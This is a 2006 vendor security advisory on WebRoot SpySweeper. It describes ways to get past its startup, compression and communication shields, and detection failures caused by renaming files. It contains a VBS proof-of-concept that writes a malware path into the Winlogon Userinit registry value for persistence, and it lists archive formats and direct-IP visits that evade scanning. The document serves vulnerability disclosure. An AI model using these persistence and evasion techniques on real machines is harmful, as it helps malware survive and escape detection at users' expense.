Multiple Bypass and Integrity Lost Vulnerabilities
Sentinel Computer Security Advisory
Sentinel Co.
http://www.sentinel.gr
info@xxxxxxxxxxx
General Flaw Description : Multiple Bypass and Integrity Lost Vulnerabilities
-------------------------------------------------------------------------------
Advisory Information
-------------------------------------------------------------------------------
Advisory Release Date : 2006/06/20
Advisory ID : SGA-0001
Extends : None
Deprecates : None
-------------------------------------------------------------------------------
Product Information
-------------------------------------------------------------------------------
Software Product Name : SpySweeper
Product Version : All to 4.5.9 Build 709
Product Vendor : WebRoot (http://www.webroot.com)
Flawed File Name : spysweeper.exe
File Version : All to 4.5.9 Build 709
Default Local Path of the File : C:\Program Files\Webroot\Spysweeper\
-------------------------------------------------------------------------------
Vulnerability Information
-------------------------------------------------------------------------------
Flaw Type : Design Flaw
Operating Systems : All Microsoft Windows
Vulnerability Impact : Bypass Security Measures
Vulnerability Rating : Critical
Patch Status : Unpatched
Advisory Status : Verified
Publicity Level : Published
Other Advisories IDs : None
Flaw Discovery Date : 2006/05/30
Patch Date : None
Vulnerability Credit : Emmanouil Gavriil (egavriil@xxxxxxxxxxx)
Exploit Status : Not Released
Exploit Publication Date : None
-------------------------------------------------------------------------------
Description
-----------
WebRoot SpySweeper is an application that provides various security measures
for your computer. Some of these measures can be easily bypassed. The bypass
methods can be used by malware in order to avoid security measures provided by
SpySweeper.
Technical Information
---------------------
The following vulnerabilities have been addressed to WebRoot SpySweeper:
1) Bypassing Startup-Shield. Modifications to Registry Keys could avoid the
Security Measures provided by the Startup Shield.
2) Bypassing Compression Sweep. Compression Sweep claims to detect malware in
compressed files, but it seems that it only detects malware in files
compressed with the ZIP compression.
3) Bypassing Spy Communication Shield. Spy Communication Shield seems to check
only the domain name to be visited. Instead, if the site is visited by it's
IP address, Spy Communication Shield does not block it.
4) Integrity lost due to wrong detection of files.
Proof of Concept Experiment
---------------------------
1) The following Registry Keys can be used to bypass the startup shield:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\Userinit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell
HKEY_CLASSES_ROOT\exefile\shell\open\command @="\"%1\" %*"
HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed
Components\KeyName
You can use the following script to prove the vulnerability (save the
following code as .vbs):
****************************************************************************
Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell. RegWrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\", 1, "REG_BINARY"
WshShell. RegWrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\Userinit", "C:\WINDOWS\system32\userinit.exe,
C:\malware.exe", "REG_SZ"
WScript. Echo "There is an entry at:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\Userinit with Value
'C:\WINDOWS\system32\userinit.exe, C:\malware.exe' After the execution of
userinit.exe, malware.exe could be run!"
****************************************************************************
2) Compressed file scanning can be bypassed by compressing to one of the
following formats:
RAR, GZ, TAR, CAB, ACE
3) Spy Communication Shield Bypass Proof of Concept:
banners.pennyweb.com should be blocked.
63.208.235.96 is not blocked.
4) 90.dl and or 51.dl are valid ARRISCAD (www.arriscad.com) drawing list files.
SpySweeper tends to remove those files. Such a removal action could destroy
an arriscad database. Furthermore is quite interesting why even an empty
file with the name 90.dl or ieonflow.dll can be considered adware or
spyware. Additionally the renaming of some malware files (ex. ieonflow.dll)
avoids the detection as malware from the SpySweeper.
Patch Description and Information
---------------------------------
Vendor informed. No reply yet. No patch released yet.
References and Other Resources for Information
----------------------------------------------
None.
EOF.